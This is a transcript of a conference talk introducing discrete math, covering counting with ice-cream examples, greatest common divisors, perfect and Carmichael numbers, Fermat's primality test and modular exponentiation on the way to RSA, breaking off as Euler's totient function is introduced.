All right, let's get started. So I do have this light over here. I said this in my last talk an hour ago. I do have the feeling that an alien abduction is taking place. It's just like I could just see this UFO here. So that, okay, so in America that's a joke. We would call that a joke. And you do that. That's perfect. All right, good. We can do this. Welcome and thank you for coming here. Is everybody enjoying NDC? It's going well? Good. Good. Seems like it's going really great. I am delighted to be here. I'm Tim Berglund, TL Berglund on Twitter. I work for DataStacks, where the company that makes the commercial distribution of Apache Cassandra, which is a scalable, fault tolerant database, but man does not live by databases alone. And so sometimes there are other fun things to talk about. And I hope that this is one of those topics. So if you studied computer science in university, regardless of how long ago that was, this is typically there is a class in four years of study in discrete math. You'll take a semester of discrete math. I certainly remember when I took it, my degree was kind of more like electrical engineering, but it had enough software stuff in there that discrete math was in the program. And it was one of those things where it was just mind blowing. I mean, I remember the sort of problems you can solve with this just don't even look like math problems, but really, really neat stuff in here. And that's typical, you know, most undergraduates, they take it, they're like, wow, this is really cool. And then you never touch it again. Maybe you'll wander across a hacker news post that mentions some combinatorics thing, and you're like, oh yeah, we did that. And so the purpose of this talk is honestly just to have some fun with this stuff. It's stuff that most of us have studied before. And the typical experience people have is we remember that stuff and see some of what it's good for. So we'll see some things that are clearly practical. Some of it is just raw fun with numbers. We'll do a little bit of that. And the direction of the talk, it's not all just one story arc. You know, there's a lot of little things we'll talk about, but we're going to end up looking at the RSA algorithm or the thing that gets public key cryptography done. We're going to look at how to create public and private key pairs and the actual calculation that is done with those numbers on the messages that we send back and forth over the internet when we're using PKI. So that's an eminently practical application. We're going to end on that. To get there, we're going to have to wander through some theorems about things that by themselves they don't seem all that useful, but they are going somewhere. We're going to end up actually doing RSA calculations and seeing how all that stuff fits together is totally cool. Now, was that a question or was that a? No, okay. That was a bid. This was an auction. You would now, like it or not, you would have the winning bid. All right. Now, the way I think about stuff is I say, hey, a talk on discrete math, that sounds fun. Let me do that. And I sat down to make an outline. I usually use like a mind mapping tool. And I said, well, if I'm going to talk about the discrete math, I have to think about what's math. And I went down that path a little bit and I realized I really don't want to go down that path. Okay, that's not a pleasant thing. It's actually a really cool thing, but you know, that would go off the path a little bit. That's a question for philosophers to ask. 
Mathematicians can't tell you what math is. Philosophers of mathematics have to tell you what that is. So let's just assume we sort of know vaguely what math is. We have this idea in our head. Discrete math is a subset of math that, in principle, it deals with whole numbers. And you can do an awful lot of fun stuff with whole numbers. So this is math with integers. There's also this subset of discrete math that we'll call number theory. There's some neat stuff in here. A lot of number theory, at least by my estimation, a lot of it is just fun. It's just like, oh, neat. You can do that with numbers. That's kind of cool. And we'll do some of those cool things with numbers. Just, you know, look around. And then modular arithmetic is a big part of discrete math. And there's a lot of interesting, you know, theorems that have been proved and things that are still being worked on. And this is where the RSA theorem lives, under the heading of modular arithmetic. All right. There's a bunch of modular stuff that gets done. And in some cases, some 250-year-old findings in discrete math get pulled in. And then some newer things, and they all get combined, and we get an internet out of it. So it's pretty amazing. That's not true that we get an internet. We get a commercially useful internet out of it. We would have had an internet if there had never been any public key cryptography. It just, you wouldn't buy things with it or send things that were secret. That would be sort of hard. So that's kind of our plan. Now, graph theory is also very much properly a part of discrete math. We're not going to talk about that in this talk. If, here's a shameless plug, 8,000 miles from here in July, if you're going to be at OZCON, I'm going to have sort of a follow-up talk to this that's on graph theory. So if anybody's planning on being at OZCON, I'll see you there in Portland. We can get a donut together. All right. A couple of things that I want to point you to. These slides will be available somewhere, and there's places you can get this online. But that course right there is a series of video lectures by a company. It's, you buy it for like 50 bucks. You download the videos. A company called The Teaching Company, and it's this crazy guy named Arthur Benjamin. He's a professor of mathematics at Harvey Mudd College, and he is amazing. So this is 24 30-minute lectures kind of on the whole span of discrete mathematics. And he's this like really geeky guy who is passionately in love with this material, and he gets all excited. And you know, sometimes his tie is like off, and it just bugs the daylights out of me. I'm like, no, isn't there a producer on set that could straighten up for 30 minutes? You're going to watch his tie be off. But he's amazing. He's a great teacher, and a lot of this material is taken from this. So if you want more, go check that out. Finally, that link right there will take you to a TED talk of this man. If you want to get a taste of what he's like, he does all this mental math stuff. Apparently he has a whole course on how to do calculations in your head. I haven't taken that course because I don't care. But he does, and he does like this magic show. He dresses up like a magician, and he gets somebody in the audience to give him a seven-digit number, and he squares it in his head. He is not normal, but anyway, just some acknowledgments to him. If you want more along these lines, and you don't want it out of a textbook, it's a good way to get it. 
So let's get started by talking about how to count. When you have collections of things, and you want to kind of draw from that collection of things in various ways, it's interesting to know how many different combinations and permutations of things you might get. So there are four different ways of counting that I'd like to talk about. I would like to talk about sequences, arrangements, subsets, and multi-subsets. Now, the best way to do this is probably to frame the discussion in terms of ice cream. I find that to be something that most people find accessible. Right? And again, this is stuff that a lot of us, we've done this math if you come from a computer science background, but I'll just kind of go over it again. Now, a sequence. Let's talk about a sequence. Sequences, you may have heard them called permutations or permutations with repetition. All right? And so a sequence of things is when I'm drawing from some collection, and the order in which I draw things out of the collection matters, and I can draw the same thing out of that collection more than once. For example, digits in a numbering system that uses place value. So imagine I have this bucket of the digits 0 through 9, and I have an infinite number of all those digits. Well, I can pick a digit out of there, it's a 5, I can put it down. I can pick a digit out, it's a 1. I can pick another digit out and a 1. And as I place these digits, I'm making a number. And the sequence of those digits matters, and of course, when I'm writing a number, I can repeat numbers. So numbers are sequences. But again, I said ice cream. So let's say I have n flavors of ice cream. I want to observe. I've been to Oslo half a dozen times. I've eaten ice cream in this city, but I don't recall seeing a lot of ice cream shops. Is that a thing? Is it there ice cream shops? Can we go get ice cream later? No. It exists, maybe. Okay. So, well, this is a really popular thing in America. Will there be an ice cream shop with 20 or 30 different flavors? And there's kind of this ice cream store motif recently where there's all these flavors and there's this big slab of polished granite that's refrigerated. There's this cold marble slab or granite slab. And they take the ice cream and they mix it on the slab and put like candy and fruit and things like that. And just chop it up and make it. Am I right? I mean, I'm selling you on this, right? This is a good idea. So imagine that kind of thing. You have n flavors of ice cream in these buckets, and there's this marble slab, and we're mixing them. And I'm going to pick, so I can mix them together and make a homogenous mixture. That would be not discreet. Okay? That would be in the realm of infinite math or continuous math. We don't want to mix them up in a bucket. We're going to pick K of these flavors and make a cone. So the order in which I take the flavors matters, and of course, I can get more than one scoop. So I could get three scoops of cheesecake. That would be a winning combination in my mind. I could get a scoop of cheesecake, a scoop of cookie dough, and a scoop of cookies and cream. And the order in which I put them matters. It's a different cone otherwise. So that's a sequence. And the number of different sequences I have is simply n to the k, not a surprising result. All right? If I have five digits, if K is five, and I have two possible digits, like I'm writing a binary digit, that's two to the five. That's 32. I can have 32 different five digit binary numbers. N to the k for sequences. 
That's an easy one. All right, let's go on. And let's look at arrangements. Now, an arrangement is ordered still. So the order in which I pick things matters, but I'm not allowed to repeat. So instead of an infinite bucket of ice cream, I have just one scoop of each. And so if I take a cheesecake scoop, I can't take a second one. A second one has to be some other flavor. N flavors, I'm picking K, and I'm making a cone still. So order matters. But like dad's in a weird mood, and he won't let you get the same flavor twice or something. Imagine that. Now, the calculation there is a little more complex. I've got n factorial over n minus k factorial. That's how many different arrangements. Or permutations without repetition. So these are both permutations. Now, there's a repository. Let's see here. You can see that. I am going to just make that font a little bigger. And I'm going to reposition that window so that everybody can see. How's that? Good deal. All right. There's a repository on GitHub. It's linked in the slides. It's got all of the interesting functions I'm going to be calculating here. There's some Clojure code that I'll put over here also for you to see occasionally if we need to refer to it. There is some Clojure code that gets this done. And I'm not going to spend a whole bunch of time stepping through that. But every once in a while, just to keep our feet on the ground, I'll run some code. So if you want to count how many different sequences you have, and I'm going to say we have 23 different flavors of ice cream, and I'm going to get three scoops on my cone, that's 12,167 ways to eat ice cream. And if I'm not allowed to repeat anything, then I have only 10,626 different ways to eat ice cream. Now that N there, that's just an implementation artifact of the Clojure REPL. What that means is internally in that function, the JVM, Clojure is a language of the JVM, so it's compiling it to Java byte code. And it decided to use internally an arbitrary precision integer class, because the number got really big. Internally, that's N factorial over N minus K factorial in Clojure there. N factorial is real big, right? So that's not going to fit in an integer. See how big that is? Oh, wait. There. That's a big number. So occasionally, you'll see a little N, a random N thrown on the bottom. When I do these, don't worry about that. Nothing to get upset about. All right. So you got sequences, you got arrangements, and you have subsets. Okay, subsets are also called combinations without repetition. So here, order doesn't matter, but I'm still not allowed to repeat. This is like they only have one scoop left of all the flavors, and instead of a cone, I'm going to make a bowl. I'm going to stick them in a bowl so the order doesn't matter. Now, this is kind of a special way of counting. It gets its own notation and its own name. It looks like that. We draw it like that. An N with a K, you know, a number with a number below it and big parentheses around the two. And we can read that in two ways. It's called the binomial coefficient of N and K. And so I could say the binomial coefficient of N and K every single time if I wanted to, or I could simply say N choose K. All right. Now N choose K fortunately has a closed form definition. It looks kind of like arrangements, but it's not quite the same number. N factorial over K factorial times N minus K factorial.
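The repository the speaker runs is Clojure; purely as an illustration, the same two counts can be sketched in F# like this. The function names are mine, and bigint is used because factorials overflow ordinary integers quickly.

```fsharp
let factorial n =
    [1 .. n] |> List.fold (fun acc i -> acc * bigint i) 1I

// Sequences (ordered, repetition allowed): n^k
let sequenceCount n k = pown (bigint n) k

// Arrangements (ordered, no repetition): n! / (n - k)!
let arrangementCount n k = factorial n / factorial (n - k)

sequenceCount 23 3      // 12167
arrangementCount 23 3   // 10626
```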
Now, binomial coefficients are, they, they pop up in lots of places in discrete math. They just, you'll see like some graph problem and you're working out the, you know, the computational cost of doing something with the graph and all of a sudden this binomial coefficient pops up out of nowhere. They're just a thing that happens. Let me, let me go over and calculate one here. So this function is called binomial coefficient. And the binomial coefficient here would be 1,771. That's the number of different ways I can make a bowl of three scoops out of 23 flavors of ice cream if I can't repeat. Now the place where it shows up suspiciously is Pascal's Triangle. So Pascal's Triangle is the thing that often elementary school kids or kids in their first few years of math will do some exercise and compute that because you can do it by just starting writing some numbers and then doing addition. You can do it sort of iteratively a row after row after a row looking up at the row above you. In fact, I have locked in my head. I must have been in an elementary school classroom at some point in the last few years because now every time I think about Pascal's Triangle, I think of this triangle of sheep with numbers written on them. So it was some, you know, eight-year-old kids making Pascal's Triangle. Anyway, Pascal's Triangle is made out of binomial coefficients. All right? So the nth row of Pascal's Triangle and the kth number in is the binomial coefficient of n and k. And I've got a function here. It's actually a sequence. I don't need parentheses on it. That is, in Clojure, an infinite lazy sequence of Pascal's Triangle. So if I hit that, it would start and it would just never stop. And that would be, I think, unstimulating for all of us because we would not want to see all that much of it. But, you know, I can take the first ten rows of Pascal's Triangle and those things in parentheses are lists of those numbers. You can see them walking through there. If we went to, you know, we could eventually find the 23rd and you'll look in there and at some point you'll find our number, which I won't trouble you with, but 1771 is our count there. This is an important thing that comes up in other places. Important enough that it gets its own name. Subsets. Now, it seems like discrete mathematicians kind of ran out of creative gas here because after subsets you get multi-subsets. You know, gee, that's kind of an original name. But this is just another unordered collection where you can repeat. You can pick the same thing twice. So this can also be called, you may have seen this called a combination with repetition. So in the ice cream case, again, n flavors of ice cream out there, but there's an infinite supply of ice cream, fortunately, in each bucket and I can get, I can make a bowl of k flavors and I can repeat if I want. Now, they really ran out of creative gas when they came to the notation because instead of, of, binomial coefficient, they're like, yeah, let's just throw another set of parentheses on there. It's fine. And you read that as n multi-choose k. Fortunately, multi-choosing is defined in closed form in terms of the binomial coefficient. So n multi-choose k is simply n plus k minus 1 choose k. So simple enough. And that, that function therefore is easy to calculate. And we'll say multi-subset count of 23 and 3 is 2300. So a few more choices because I can repeat.
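For reference, a lazy Pascal's triangle and the multi-choose count might look like this in Clojure. This is a sketch that reuses the binomial-coefficient function above, not the speaker's exact code:

    ;; Each row of Pascal's triangle is the pairwise sum of the row above,
    ;; padded with zeros on both ends.
    (defn next-row [row]
      (vec (map +' (cons 0 row) (concat row [0]))))

    ;; Infinite lazy sequence of rows.
    (def pascals-triangle (iterate next-row [1]))

    ;; Unordered selection of k from n with repetition:
    ;; n multichoose k = (n + k - 1) choose k
    (defn multi-subset-count [n k]
      (binomial-coefficient (+ n k -1) k))

    ;; (take 5 pascals-triangle) => ([1] [1 1] [1 2 1] [1 3 3 1] [1 4 6 4 1])
    ;; (multi-subset-count 23 3) => 2300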
So just to go over those again, we'll have sequence count, then arrangement count (there are fewer arrangements than sequences), then the binomial coefficient, and multi-choose, a few more than that. So that's all the different ways to eat ice cream. That's counting. Now, there's more to say about this. There's, there's more that we can do with different kinds of counting. And there are other formulas, some of which only have recursive definitions. You know, they're not these nice, clean, factorial things that are comparatively easy to calculate. So some of this stuff gets expensive to calculate. But we'll, we'll stop there. We'll stop counting there. And we'll go on to number theory in brief overview. All right. So my, my youngest daughter is 15 now. And so she just finished algebra. She does not have a warm relationship with math. I've tried to encourage her to have a warm relationship with math, that, you know, if you have kids and they don't like math, math does not need to be their best friend. But it's never their enemy. You know, it really, it does want good things for them. And it's, it's a useful tool. And I've tried to tell my kids this. And they haven't all really loved math. That's okay. She doesn't, she doesn't get along well with math. And, and long division, you know, attention span is hard for her. Long division, the algorithm that we had is brutal. Okay. You got to juggle a lot of balls in your head. And it really is hard for kids to learn. She's done with that. But I want to go to something even more basic. Not, not the algorithm we use to divide long numbers on paper, but just the, the theorem that establishes what division is. It goes like this. Imagine that you have two integers. Call them A and D. All right. The division theorem says that there are these two other integers, Q and R, such that this. Easy enough. The way we might think about that is A divided by D equals Q plus some remainder. Right? That's the, that's the division theorem. Division is this thing. A equals DQ plus R. All right. We'll, we'll see if we can work with this. Now, that lets us think about the concept of divisibility. Now, divisibility simply takes the division theorem, A equals DQ plus R, and zeroes out R. All right. So, a number is divisible, divisible, that is, A is divisible by D, or D divides A, if A equals DQ and R is zero. All right. That's, that's what divisibility means. We will note this like this. D pipe A. D divides A. A is divisible by D. I could take A divided by D and I don't have a remainder. So, that's an interesting pair of numbers if D divides A. And we're going to need that. This is one of the, the blocks we're going to build on. All right. For, for example, this lets us now think about greatest common divisors. Now, there was a time in your life when finding the greatest common divisor of two numbers was a pressing existential concern for you. All right. When you were 10, 11, 12, to get through the homework set to simplify the dang fractions, you had to find the greatest common divisor. Didn't you? It mattered. It was a pain. Well, we'll note this. The kind of the long form is like this, or simply most of the time, X and Y in parentheses. We're going to say that evaluates to the greatest common divisor of X and Y. So, there was, again, a time when I, this was a problem for me and I had to solve this a lot to do my math homework and I didn't like it.
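In code, the division theorem and divisibility are one-liners. Here is a minimal Clojure sketch of my own, for positive integers:

    ;; Division theorem: for positive integers a and d there are q and r
    ;; with a = d*q + r and 0 <= r < d.
    (defn div-rem [a d]
      {:q (quot a d) :r (rem a d)})

    ;; d divides a (written d | a) when the remainder is zero.
    (defn divides? [d a]
      (zero? (rem a d)))

    ;; (divides? 9 54) => true
    ;; (divides? 9 55) => false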
And so, I had a Commodore VIC-20 and a BASIC interpreter and I wrote a rather inelegant program that got this job done for me. It was great. It was like, oh, blasting through these fraction problems. You know, I still did the rest of the work, but I'm not going to find the greatest common divisor. Please. That's for a computer to do. I never, until like a year ago, I never stopped to consider the ethics of doing that. I'm like, is that cheating? I don't even know. You know, I just, I thought I'm going to do this. And I thought if any of my kids had written code to automate fraction problems, I'd be okay with that. Like, yes, you pass. All right. We're going to come up with a better way. So, my algorithm was stupid, right? It was find all the divisors, start at one and walk through and find all the divisors and compare them and see which one's bigger. You know, that's a brute force kind of way to do it. We're going to come up with a much, much cooler way, fortunately, because we're going to need to find greatest common divisors efficiently later on. All right. Bézout's identity. This deals with greatest common divisors. So, Bézout's identity is this. Imagine that you have two integers, A and B. Whose greatest common divisor is a number G. All right. Bézout's identity, so, you got those numbers. Bézout's identity says there are these other two integers, not necessarily unique, but there are these other two integers, X and Y, such that AX plus BY equals G. Okay. That's Bézout's identity. Now, we're going to want this. Please remember this, because in the middle of the RSA stuff, you're going to see an expression that looks just like that. All right. It's going to be a special case where G is equal to 1. That's a mildly interesting case of Bézout's identity when G is 1. But we're going to have this thing, or AX plus BY equals 1. Imagine you knew, so G is 1, and you knew A and you knew B. It would seem like a big pain in the butt to figure out what those X and Y might be. Bézout is saying that they exist, but like, what are they? I don't know. Well, there is an algorithm called the extended Euclidean algorithm. That's this nifty little recursive thing that lets us fairly efficiently figure out what X and Y are. And we'll not walk through all the steps of that algorithm, but I will run it, and I will abuse you by showing you code that does it. And if you don't know Clojure real well, the code is abusive, but I'm going to do it. It's going to be brief. Don't worry. That'll happen later. So Bézout's identity, extended Euclidean algorithm, keep these balls in the air. We're going to need them. So, and here's the thing. So discrete mathematicians in days of yore were not thinking about search engine optimization. And this is bad. Okay. You need to be thinking about easily Google-able things. I was just talking about the extended Euclidean algorithm, to solve Bézout's identity. Great. Okay. Now we have Euclid's algorithm. Really? Okay. You should have had marketing look at this, because that wouldn't have happened. They would have had better names. Euclid's algorithm is an entirely different thing, but let's look at it. For A, B, and some whole number X, all right, you've got an A and B, and you want to find their greatest common divisor. That's the problem we're trying to solve here. Pick A and B, and then X. You just guess at some X, and a good place to start maybe is A divided by B, just the integer portion of A over B. Pick an X, and then do this.
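Since we will need it for RSA, here is one way the extended Euclidean algorithm can be written in Clojure. This is a sketch of the standard recursion, not the repository's exact implementation:

    ;; Returns [g x y] such that a*x + b*y = g, where g = gcd(a, b).
    ;; This is exactly Bézout's identity made constructive.
    (defn extended-gcd [a b]
      (if (zero? b)
        [a 1 0]
        (let [[g x y] (extended-gcd b (mod a b))]
          [g y (- x (* (quot a b) y))])))

    ;; (extended-gcd 299 9856) => [1 4483 -136]
    ;; check: 299*4483 + 9856*(-136) = 1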
The greatest common divisor of A and B is the greatest common divisor of B and A minus BX, recursing on that, with picking kind of this big-ish X, until we find B equal to zero. All right? So just recurse, probably only takes a few steps. When B is equal to zero, whatever A you have is the GCD of A and B. Neat, huh? That's way better than what I did when I was 10 or 11. And I think I feel okay about that. I've come to terms with the fact that I had an inelegant algorithm when I was a little boy. This is better. But we can do one step better. That's Euclid's algorithm. There's also, if we could peek ahead a little bit, the modular edition of Euclid's algorithm. Now you guys all know what modular arithmetic is. You know what the mod operator is in probably several languages each. We get it. That's the remainder portion of when you do a division. So check it out. Greatest common divisor of A and B is the greatest common divisor of B and A mod B. So we don't have to pick that weird X anymore. We just say B and A mod B. Same thing, recurse until B equals zero, whatever you have left for A. That's what you got. Let's play with that. Just to keep our feet on the ground, REPL and code will help us. So let me clear this out. And guys in the back, is that the font size? Are you okay? You all right? All right, good. Yeah. So I have a function called greatest common divisor that does that modular edition of Euclid's algorithm. Even if you don't know Lisp at all, any Lisp, you can kind of get a sense of how this might work. If B is equal to zero, then stop with your A. Otherwise, recurse. Do a tail call and call yourself with B and A mod B. So let's see. The greatest common divisor of 54 and 9 is, I'm shocked, it is 9. What about 55 and 9? It's 1. So if the greatest common divisor of two numbers is 1, then we say that those numbers are relatively prime. Or I said that in front of my older daughter once after she had been through prime numbers and she's like, what? Well, it's like kind of prime? I mean, it's prime on Tuesday. What does that mean? Prime relative to one another. Or you could say they are coprime. So 55 and 9 are coprime, meaning they have no common divisors other than 1. And you can have fun with this. So I could say, you know, big, long numbers and T is actually not a number. And oh, look, I just found two coprimes. Not surprising, I guess, because the end is there, no. And you could play, whoa, okay. Hey, I've probably given this talk like 10 times or so. And I do this, right? I just, you just make numbers up. It is very hard to find greatest common divisors that big. If you just generate random numbers, you're usually going to find 1, 2, 4, 3. It's tough to come up with big common divisors. I'll say that again. It's tough to come up with big common divisors. I didn't mean clap for me. I meant, it's a mathematically important result. But thank you. That was great. It's mathematically important that if you've just got big random numbers, it's not necessarily easy to come up with big random numbers whose common divisors are large. We're going to see that play out later in public key cryptography. So. So you can make a note for those. Yeah, yeah, hang on. This is going to, over here, that's going to my notepad. All right, good. Thanks, guys. I'm glad we could have this, this time together. Let's talk about numbers with names.
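That recursion is short enough to write from memory. Here is a sketch in Clojure, equivalent in spirit to the function shown in the talk but not copied from it:

    ;; Modular edition of Euclid's algorithm.
    (defn gcd [a b]
      (if (zero? b)
        a
        (recur b (mod a b))))

    ;; Two numbers are coprime (relatively prime) when their gcd is 1.
    (defn coprime? [a b]
      (= 1 (gcd a b)))

    ;; (gcd 54 9)      => 9
    ;; (coprime? 55 9) => true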
Now, if you come to a talk at a conference called discrete math, you are probably also the kind of person who would find yourself on Wikipedia clicking around for a few hours on numbers that have names. Okay, like evil numbers and, and, and abundant numbers and Carmichael numbers and a lot of them have mathematicians' names on them. Most of them serve no purpose. I'm convinced they serve no purpose other than publication, right? Like if I could have Berglund numbers, I'd be okay with that. I feel that would be a good thing. So I think mathematicians invent these categories so they, oh, here's nobody's come up with this. That's my number. But anyway, it's not so weird. There are some categories of numbers that are named, like even numbers and odd numbers. That's totally everybody gets that. Okay, those are numbers with names. We know what those are. We've talked about prime numbers. That's a, that's a group of numbers. That's a named group of numbers and all of the integers that aren't prime are composite. All right, great. Now, it gets weird after that. So perfect numbers. You know, how, how, how do you use perfect numbers to promote science and the useful arts? I'm not sure, but they're really cool. All right. And let's just, let's just poke around a perfect numbers a little bit. Now, a perfect number is, let's just define this. We've got some source code here for this function called perfect. It's a predicate; it takes a number and returns a Boolean. A perfect number is a number which is equal to its own aliquot sum, to which you say, oh, why didn't you just say so? What's an aliquot sum? All right, well, let's look up the source for the aliquot sum, whatever that is. Okay. Well, reduce plus proper divisors. That is, the aliquot sum of x is the sum of x's proper divisors. X's proper divisors are its integer divisors other than x itself. All right, so we'll say, for example, the proper divisors of 10 are 1, 2, and 5. Easy enough. And what would the sum of 1, 2, and 5 be? 8. Well, is 10 perfect? You already know it's not. So there you go. That's what a perfect number is. Who cares? I don't know. The first perfect number is 6. A good number of perfect numbers are known. Now, I have an infinite lazy sequence of perfect numbers, which again, as soon as I type that, we'll just start creating all of them. I'm going to just take the first five of them and you, oh, oops, that takes a minute. See, there, apparently, my means of discovering perfect numbers is not very efficient and it actually is difficult to discover perfect numbers. The sixth perfect number, I think, takes longer than the rest of the session. I've never waited for it. So it takes a long time to calculate those. But those are the perfect numbers. Now, abundant numbers, that was our next category. A number is abundant if its aliquot sum is greater than the number itself. It's deficient, it's deficient if its aliquot sum is less than the number itself. So those are a little more plentiful. You kind of find those lying all over the ground. The first 100 deficient numbers and then the first 100 abundant numbers, they're all over the place. You see deficient numbers are apparently a little more abundant than abundant numbers, because the 100th deficient number, you only get to 133, and the 100th abundant number, you get to 416. Go ahead later, look up the Wikipedia page for perfect numbers and you'll see the highest known perfect number, the number of digits it has, who discovered it and in what year. Typically for the Wikipedia pages, for the named numbers that are interesting, you'll get a little list.
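A naive sketch of those definitions in Clojure, fine for small numbers and certainly not how you would hunt for the next record perfect number:

    ;; Proper divisors of x: integers from 1 to x-1 that divide x evenly.
    (defn proper-divisors [x]
      (filter #(zero? (rem x %)) (range 1 x)))

    ;; The aliquot sum is the sum of the proper divisors.
    (defn aliquot-sum [x]
      (reduce + (proper-divisors x)))

    (defn perfect?   [x] (= x (aliquot-sum x)))
    (defn abundant?  [x] (< x (aliquot-sum x)))
    (defn deficient? [x] (> x (aliquot-sum x)))

    ;; (proper-divisors 10) => (1 2 5)
    ;; (perfect? 6)         => true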
You can get your name in mathematics history by writing a Hadoop job that does that. So there you go, perfect named numbers. Now, a slightly more interesting class of numbers is the Carmichael numbers. Now, telling whether a number is prime is difficult. The only way to know for sure is to look. You've got to divide, if it's a big number, you've got to divide it by a bunch of numbers and you get to the end and you're like, okay, I didn't find anything that worked out, this must be prime. So you kind of have to search exhaustively. There are a number of probabilistic prime methods, prime proofs or detectors, they're not proofs, but they tell you whether a number is probably prime. So you have Fermat's test for primality. It's pretty nice, it's pretty quick and it tells you whether a number is probably prime by saying, well, n is prime if 2 to the n mod n is equal to 2. Basically, if a to the n mod n is equal to a, that's Fermat's test for primality, that means the number is probably prime. Some composites slip through there; those are the Carmichael numbers. So if you could cheaply calculate all the Carmichael numbers, you could use that with Fermat's test for primality and you'd be in good shape. Unfortunately, you can't cheaply calculate all the Carmichael numbers. You have to use Fermat's test to figure them out, but that's just an example of another category of named numbers. This is important, this probabilistic primality test, because later on we're going to have to generate random numbers and tell whether they're prime. I'm going to save you time by generating them myself from my notes, but in real life when you're generating a key pair in, like with OpenSSL or something, it has to go generate a random number and see is this random number prime and it needs to use efficient probabilistic methods of telling whether it's really seriously probably darn sure prime and that's how they work. And you could look up the details of how various encryption implementations do that. They typically combine a few probabilistic prime tests each, Fermat's test being one of them. Okay. We're doing okay on time. We got 23 minutes left, which should be just right. That brings us to modular arithmetic. Again, we're programmers. We know what this is. A mod B gives us the remainder when you divide A by B. Simple enough. But there's a little more to be said here and really funky things happen. And I think there's a slightly more evocative way to think about modular arithmetic. First, a lame formula. This is the formal definition of modular arithmetic. Oh, and by the way, where does this get used in real life? All over the place. Like, what time is it right now? It's 1657. How many hours since the beginning of the epoch? You don't know. You'd have to write code to figure that out. That's because we only count time mod 24, where I live mod 12. So clocks do this. What day is it since the beginning of the epoch? You have no idea. You would have to do some math and write some code to figure that out because we do months and days mod 12 and mod various other strange things. So this happens in the way we count time. It's a thing that we do. And basically this was the idea of Gauss, like a lot of other discrete math and fundamental stuff in discrete math. But we're going to say that A is congruent to B mod M. It's the three lines; we say that, we talk about congruence, not equality. If that expression is true. Now that is so counterintuitive, you can't even believe it.
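To make Fermat's test concrete, here is a hedged one-base sketch in Clojure, leaning on Java's BigInteger modPow rather than anything from the talk's repository:

    ;; Fermat: if n is prime then a^n mod n = a for every a.
    ;; Composites that sneak past this for every coprime base are the
    ;; Carmichael numbers, so a pass only means "probably prime".
    (defn fermat-probable-prime? [n a]
      (= (biginteger (mod a n))
         (.modPow (biginteger a) (biginteger n) (biginteger n))))

    ;; (fermat-probable-prime? 13 2)  => true   ; 13 really is prime
    ;; (fermat-probable-prime? 561 2) => true   ; 561 = 3*11*17, a Carmichael number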
That's the formal definition of congruence or modular equality. Let me give you a better way to think about that and then an even better way to think about that. A is congruent to B mod M if A mod M equals B mod M. That's kind of what you'd think modular equality or congruence is. Here's an even cooler way to think about it. This is how I would explain modular math to somebody who had no idea what it meant. Imagine you have a pair of magic goggles that you can put on. You look around without the goggles, you see numbers in places. You look down, there's a number written, you see the actual number. You place these goggles on, it's got a little dial on the side that's your M dial. You could dial that to say six. And when you do that, you look at a number, you don't see the number, you see the number mod six. Okay, so modular arithmetic is kind of like arithmetic with these mod M glasses on. You could dial them to whatever the modulus is going to be. All of the numbers in the world just change to their modular equivalents. So addition works in modular arithmetic. If A is congruent to B and C is congruent to D mod M, then A plus C is congruent to B plus D mod M. Vaguely intuitive. We kind of expect that to work. Multiplication works. We can get a way of multiplying. So if A is congruent to B and C is congruent to D mod M, then A times C is congruent to B times D mod M. So you get some just fundamental stuff that you can do by putting these mod M glasses on. Now, let me show you a fun thing that we can do with this. I want to show you an algorithm first called seed planting. And there's nothing particular, particularly modular about this algorithm, but then I'm going to tweak it with a modular edition. And this is another little tool that we're going to be super glad to have in a few minutes. Let us suppose I want to raise a big number to a big power. That's important to me. And for our example, I'm going to pick, seven's not all that big, but 103 is pretty big, right? That's 103 multiplications. That's a lot. So I'm going to raise seven to the 103rd power. The seed planting algorithm works like this. Now, 103 in binary is 1100111. Take my word for it. Totally is. And I'm going to start, I'm going to put a little one down here in the corner. And that's going to be sort of my accumulator. We're going to keep track of numbers down there. So I'm going to start with a one. Then I'm going to go to my most significant bit in my exponent. That's a one. What I do for every bit is I'm going to take what's in my accumulator and square it. One squared. That's one. I see a one in my exponent. So I'm going to multiply times my base. I'll say times seven. So one squared times seven. That's seven. Well, good. Seven goes down into the accumulator. Next digit. Seven squared. That's 49, times seven because I see a one there. That's 343. Awesome. All right. 343 goes down to my accumulator. I scoot over to the next digit. That's a zero. Well, I still square what's in my accumulator. 343 squared, which is 117,649. But I see a zero, so we do not get the bonus seven at this point. All right. Next digit, squared again. We're getting a little out of hand here. I'm going to stop reading the numbers because it gets to be unwieldy. And next digit, I got to throw in another seven there because I see a one, and another seven and another seven. And I get a result. You know, that's cool. So seven to the 103rd power is this. All right. I'm glad that we know that.
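The seed-planting walk over the bits can be written in a few lines. A sketch of my own in Clojure, with auto-promoting multiplication so the big intermediate numbers are fine:

    ;; Square-and-multiply: walk the exponent's bits from the most significant
    ;; end, square the accumulator at every bit, and multiply in the base
    ;; whenever the bit is 1.
    (defn power [base e]
      (reduce (fn [acc bit]
                (let [sq (*' acc acc)]
                  (if (= \1 bit) (*' sq base) sq)))
              1
              (Long/toBinaryString e)))

    ;; (power 7 103) => 7 to the 103rd, in only about 7 squarings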
What I have there, though, is a way to do that in fewer multiplications. 103 multiplications is not a big deal if I only have to do it once. But, you know, maybe many millions of multiplications or billions of multiplications might be a problem. And if I can basically hack that down by log two, I'm going to be a pretty happy camper. So this is a nice algorithm for doing big multiplications. I'm still going to be in the realm of arbitrary precision integers here. There's no machine word that's going to keep track of that for me. So this is going to be fairly slow math. But suppose, I wanted to show you that algorithm because we're still talking about modular stuff, suppose what I really want is a to the b mod m. All right. I want seed planting, the modular edition. So we're going to do seven to the 103 mod 53. There's our exponent again. And here's how the game changes. There's a one down there still. We'll say one squared times seven. Ah, mod 53. Every time we throw that mod in there. Well, that's seven. So seven goes down into the accumulator. Seven squared times seven. Mod 53. That's 25. You see, the numbers don't get all that big. They stay small. I might still have to do a few multiplications. Potentially, if a and b, you know, seven and 103 and the modulus, if those are big numbers, maybe I still need to use arbitrary precision integer classes to get this work done. But my numbers stay much smaller. I'm going to do less work. And I end up with 38 is my answer. So now you know seven to the 103 mod 53 is 38. And you can get some idea. Now, these are pretty small. So we have just the regular power seven to the 103. It takes a quarter of a second. And these are kind of small for the timings to matter. Yeah, you'd need bigger numbers. So don't let me time these. That's kind of silly. But I can take the timing away and just say, there you go. That's 38 with the modulus in there. And that's our power by seed planting. And I could say, well, what's the power, what's that mod 53? You know, I could do it the long way and then get the result. And I still get 38 as an arbitrary precision integer. So, you know, these things, these algorithms work. And we might want to have one in our pocket in just a minute. If I could, if I could introduce one more function, and that is called Euler's totient function, all right, we need this guy, usually just denoted as phi of n, all right, phi of n, that's Euler's 